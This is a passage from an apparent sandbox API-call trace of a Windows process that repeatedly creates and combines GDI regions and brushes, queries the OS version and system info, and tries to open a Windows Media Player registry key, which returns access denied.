(hrgnDst=0x1040dd1, hrgnSrc1=0xd50401d6, hrgnSrc2=0xd70401d3, iMode=1) returned 1 [0087.916] CombineRgn (hrgnDst=0x1040dd2, hrgnSrc1=0xd50401d6, hrgnSrc2=0xd70401d3, iMode=4) returned 2 [0087.916] CreateSolidBrush (color=0xff) returned 0x2100dd0 [0087.916] CreateSolidBrush (color=0xff0000) returned 0x1100dd3 [0087.916] DeleteObject (ho=0x1100dd3) returned 1 [0087.916] DeleteObject (ho=0xd70401d3) returned 1 [0087.916] DeleteObject (ho=0xd50401d6) returned 1 [0087.916] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.916] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.916] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.916] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.916] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.916] BeginPath (hdc=0x0) returned 0 [0087.916] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.916] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.916] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.916] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.916] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.916] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.916] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.916] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.916] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd80401d3 [0087.916] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd60401d6 [0087.916] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd4 [0087.916] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd5 [0087.916] CombineRgn (hrgnDst=0x1040dd4, hrgnSrc1=0xd80401d3, hrgnSrc2=0xd60401d6, iMode=1) returned 1 [0087.916] CombineRgn (hrgnDst=0x1040dd5, hrgnSrc1=0xd80401d3, hrgnSrc2=0xd60401d6, iMode=4) returned 2 [0087.916] CreateSolidBrush (color=0xff) returned 0x2100dd3 [0087.916] CreateSolidBrush (color=0xff0000) returned 0x1100dd6 [0087.916] DeleteObject (ho=0x1100dd6) returned 1 [0087.916] DeleteObject (ho=0xd60401d6) returned 1 [0087.916] DeleteObject (ho=0xd80401d3) returned 1 [0087.916] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.916] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.916] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.916] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.916] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.917] BeginPath (hdc=0x0) returned 0 [0087.917] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.917] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.917] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.917] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.917] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.917] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.917] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.917] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.917] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd70401d6 [0087.917] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd90401d3 [0087.917] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd7 [0087.917] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd8 [0087.917] CombineRgn (hrgnDst=0x1040dd7, hrgnSrc1=0xd70401d6, hrgnSrc2=0xd90401d3, iMode=1) returned 1 [0087.917] CombineRgn (hrgnDst=0x1040dd8, hrgnSrc1=0xd70401d6, hrgnSrc2=0xd90401d3, iMode=4) returned 2 [0087.917] CreateSolidBrush (color=0xff) returned 0x2100dd6 [0087.917] CreateSolidBrush (color=0xff0000) returned 0x1100dd9 [0087.917] DeleteObject (ho=0x1100dd9) returned 1 [0087.917] DeleteObject (ho=0xd90401d3) returned 1 [0087.917] DeleteObject (ho=0xd70401d6) returned 1 [0087.917] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.917] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.917] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.917] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.917] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.917] BeginPath (hdc=0x0) returned 0 [0087.917] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.917] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.917] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.917] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.917] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.917] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.917] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.917] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.918] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xda0401d3 [0087.918] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd80401d6 [0087.918] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dda [0087.918] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ddb [0087.918] CombineRgn (hrgnDst=0x1040dda, hrgnSrc1=0xda0401d3, hrgnSrc2=0xd80401d6, iMode=1) returned 1 [0087.918] CombineRgn (hrgnDst=0x1040ddb, hrgnSrc1=0xda0401d3, hrgnSrc2=0xd80401d6, iMode=4) returned 2 [0087.918] CreateSolidBrush (color=0xff) returned 0x2100dd9 [0087.918] CreateSolidBrush (color=0xff0000) returned 0x1100ddc [0087.918] DeleteObject (ho=0x1100ddc) returned 1 [0087.918] DeleteObject (ho=0xd80401d6) returned 1 [0087.918] DeleteObject (ho=0xda0401d3) returned 1 [0087.918] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.918] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.918] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.918] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.918] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.918] BeginPath (hdc=0x0) returned 0 [0087.918] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.918] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.918] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.918] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.918] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.061] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.061] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.061] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.061] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd90401d6 [0088.061] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdb0401d3 [0088.061] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ddd [0088.061] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dde [0088.062] CombineRgn (hrgnDst=0x1040ddd, hrgnSrc1=0xd90401d6, hrgnSrc2=0xdb0401d3, iMode=1) returned 1 [0088.062] CombineRgn (hrgnDst=0x1040dde, hrgnSrc1=0xd90401d6, hrgnSrc2=0xdb0401d3, iMode=4) returned 2 [0088.062] CreateSolidBrush (color=0xff) returned 0x2100ddc [0088.062] CreateSolidBrush (color=0xff0000) returned 0x1100ddf [0088.062] DeleteObject (ho=0x1100ddf) returned 1 [0088.062] DeleteObject (ho=0xdb0401d3) returned 1 [0088.062] DeleteObject (ho=0xd90401d6) returned 1 [0088.062] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.062] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.062] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.062] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.062] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.062] BeginPath (hdc=0x0) returned 0 [0088.062] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.062] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.062] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.062] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.062] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.062] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.062] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.062] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.062] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdc0401d3 [0088.062] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xda0401d6 [0088.062] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de0 [0088.062] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de1 [0088.062] CombineRgn (hrgnDst=0x1040de0, hrgnSrc1=0xdc0401d3, hrgnSrc2=0xda0401d6, iMode=1) returned 1 [0088.062] CombineRgn (hrgnDst=0x1040de1, hrgnSrc1=0xdc0401d3, hrgnSrc2=0xda0401d6, iMode=4) returned 2 [0088.062] CreateSolidBrush (color=0xff) returned 0x2100ddf [0088.062] CreateSolidBrush (color=0xff0000) returned 0x1100de2 [0088.062] DeleteObject (ho=0x1100de2) returned 1 [0088.062] DeleteObject (ho=0xda0401d6) returned 1 [0088.062] DeleteObject (ho=0xdc0401d3) returned 1 [0088.062] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.062] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.063] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.063] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.063] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.063] BeginPath (hdc=0x0) returned 0 [0088.063] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.063] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.063] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.063] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.063] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.063] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.063] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.063] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.063] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdb0401d6 [0088.063] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdd0401d3 [0088.063] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de3 [0088.063] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de4 [0088.063] CombineRgn (hrgnDst=0x1040de3, hrgnSrc1=0xdb0401d6, hrgnSrc2=0xdd0401d3, iMode=1) returned 1 [0088.063] CombineRgn (hrgnDst=0x1040de4, hrgnSrc1=0xdb0401d6, hrgnSrc2=0xdd0401d3, iMode=4) returned 2 [0088.063] CreateSolidBrush (color=0xff) returned 0x2100de2 [0088.063] CreateSolidBrush (color=0xff0000) returned 0x1100de5 [0088.063] DeleteObject (ho=0x1100de5) returned 1 [0088.063] DeleteObject (ho=0xdd0401d3) returned 1 [0088.063] DeleteObject (ho=0xdb0401d6) returned 1 [0088.063] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.063] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.063] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.063] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.063] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.063] BeginPath (hdc=0x0) returned 0 [0088.063] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.063] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.063] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.063] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.063] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.063] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.063] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.064] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xde0401d3 [0088.064] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdc0401d6 [0088.064] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de6 [0088.064] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de7 [0088.064] CombineRgn (hrgnDst=0x1040de6, hrgnSrc1=0xde0401d3, hrgnSrc2=0xdc0401d6, iMode=1) returned 1 [0088.064] CombineRgn (hrgnDst=0x1040de7, hrgnSrc1=0xde0401d3, hrgnSrc2=0xdc0401d6, iMode=4) returned 2 [0088.064] CreateSolidBrush (color=0xff) returned 0x2100de5 [0088.064] CreateSolidBrush (color=0xff0000) returned 0x1100de8 [0088.064] DeleteObject (ho=0x1100de8) returned 1 [0088.064] DeleteObject (ho=0xdc0401d6) returned 1 [0088.064] DeleteObject (ho=0xde0401d3) returned 1 [0088.064] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.064] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.064] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.064] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.064] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.064] BeginPath (hdc=0x0) returned 0 [0088.064] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.064] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.064] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.064] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.064] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.064] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.064] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.064] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdd0401d6 [0088.064] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdf0401d3 [0088.064] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040de9 [0088.064] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dea [0088.064] CombineRgn (hrgnDst=0x1040de9, hrgnSrc1=0xdd0401d6, hrgnSrc2=0xdf0401d3, iMode=1) returned 1 [0088.064] CombineRgn (hrgnDst=0x1040dea, hrgnSrc1=0xdd0401d6, hrgnSrc2=0xdf0401d3, iMode=4) returned 2 [0088.064] CreateSolidBrush (color=0xff) returned 0x2100de8 [0088.065] CreateSolidBrush (color=0xff0000) returned 0x1100deb [0088.065] DeleteObject (ho=0x1100deb) returned 1 [0088.065] DeleteObject (ho=0xdf0401d3) returned 1 [0088.065] DeleteObject (ho=0xdd0401d6) returned 1 [0088.065] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.065] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.065] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.065] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.065] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.065] BeginPath (hdc=0x0) returned 0 [0088.065] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.065] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.065] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.065] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.065] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.065] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.065] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.065] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.065] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe00401d3 [0088.065] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xde0401d6 [0088.065] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dec [0088.065] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ded [0088.065] CombineRgn (hrgnDst=0x1040dec, hrgnSrc1=0xe00401d3, hrgnSrc2=0xde0401d6, iMode=1) returned 1 [0088.065] CombineRgn (hrgnDst=0x1040ded, hrgnSrc1=0xe00401d3, hrgnSrc2=0xde0401d6, iMode=4) returned 2 [0088.065] CreateSolidBrush (color=0xff) returned 0x2100deb [0088.065] CreateSolidBrush (color=0xff0000) returned 0x1100dee [0088.065] DeleteObject (ho=0x1100dee) returned 1 [0088.065] DeleteObject (ho=0xde0401d6) returned 1 [0088.065] DeleteObject (ho=0xe00401d3) returned 1 [0088.065] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 